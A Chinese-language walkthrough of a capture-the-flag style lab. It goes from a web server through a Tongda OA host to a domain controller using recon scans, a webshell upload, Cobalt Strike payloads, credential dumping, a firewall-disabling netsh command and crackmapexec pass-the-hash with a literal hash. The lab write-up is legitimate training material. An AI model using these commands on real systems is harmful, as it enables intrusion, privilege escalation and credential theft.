靶场描述

靶场拓扑图

PS：该靶场作者：暗月

HOSTS设置

 cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
# 4-attack
192.168.0.204 www.moonlab.com

WEB服务器

信息收集

端口扫描

$ sudo nmap -sT -sV -O 192.168.0.204
Starting Nmap 7.93 ( https://nmap.org ) 
Nmap scan report for www.moonlab.com (192.168.0.204)
Host is up (0.0018s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     Microsoft ftpd
80/tcp  open  http    Microsoft IIS httpd 10.0
999/tcp open  http    Microsoft IIS httpd 10.0
MAC Address: 00:0C:29:36:38:42 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012 (98%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2016 (98%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.89 seconds

目录遍历

dirsearch -u "www.moonlab.com"              

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/www.moonlab.com.txt

Error Log: /home/kali/.dirsearch/logs/errors.log

Target: http://www.moonlab.com/
403   312B   http://www.moonlab.com:80/%2e%2e//google.com
200   410B   http://www.moonlab.com:80/0.php
200   407B   http://www.moonlab.com:80/58
200   407B   http://www.moonlab.com:80/59
200   406B   http://www.moonlab.com:80/6
200   410B   http://www.moonlab.com:80/6.php
200   414B   http://www.moonlab.com:80/ADMIN.jsp
403   312B   http://www.moonlab.com:80/\..\..\..\..\..\..\..\..\..\etc\passwd
200   415B   http://www.moonlab.com:80/app.config
200   424B   http://www.moonlab.com:80/bitrix/import/files
200   425B   http://www.moonlab.com:80/bitrix/import/import
301   155B   http://www.moonlab.com:80/contents    -> REDIRECTS TO: http://www.moonlab.com/contents/
301   154B   http://www.moonlab.com:80/include    -> REDIRECTS TO: http://www.moonlab.com/include/
200     0B   http://www.moonlab.com:80/index.htm
200   266B   http://www.moonlab.com:80/readme.txt
200    84B   http://www.moonlab.com:80/robots.txt
301   157B   http://www.moonlab.com:80/SiteServer    -> REDIRECTS TO: http://www.moonlab.com/SiteServer/
301   155B   http://www.moonlab.com:80/template    -> REDIRECTS TO: http://www.moonlab.com/template/
200     7KB  http://www.moonlab.com:80/umbraco/webservices/codeEditorSave.asmx
301   153B   http://www.moonlab.com:80/upload    -> REDIRECTS TO: http://www.moonlab.com/upload/
200     5B   http://www.moonlab.com:80/version.txt

robots.txt

漏洞测试

密码找回

问题参数为空时，可显示密码。

后台文件上传Getshell

上传压缩后的Behider的aspx马。

1	http://www.moonlab.com/sitefiles/sitetemplates/c/c.aspx

上线cs

AV_Evasion_Tool

生成pyload.c，使用掩日生成反向马。

权限提升

SpoolSystem Inject

1	shell va.exe

导出明文

OA服务器

信息收集

端口扫描

Host is up (1.2s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-robots.txt: 1 disallowed entry 
|_/
49152/tcp open  msrpc   Microsoft Windows RPC
49153/tcp open  msrpc   Microsoft Windows RPC
49155/tcp open  msrpc   Microsoft Windows RPC
49156/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4775.10 seconds

漏洞测试

80端口为通达OA，利用通达OA漏洞检测工具拿到shell。

蚁剑直接连接：

cs生成正向马，执行后connect 没反应，查看进程，正向马正常运行。存在防火墙，将防火墙关闭。

1	NetSh Advfirewall set allprofiles state off

关闭后成功上上线：

明文抓取，拿到了域控啥的Hash。

域控

信息收集

定位域控信息：

1
2
3

shell net user /domain
shell net time /domain
shell ping dc.attack.local

CS横向移动PsExec

OA服务器到密码的时候拿到了域管理员的Hash，但是正向上线失败，在OA服务器上创建监听，反向上线成功。

crackmapexec

可以通过CME测试Hash的正确性。

1	proxychains crackmapexec smb 10.10.12.165 -u administrator -H '15132c3d36a7e5d7905e02b478979046' -x whoami

进程注入横向移动

注入ATTACK\administrator 进程，拿到域管权限的会话。

使用注入后的会话，选择使用会话当前的访问令牌横向移动。

成功上线，拿到域控机器。

Flag

1	shell type C:\Users\Administrator\flag.txt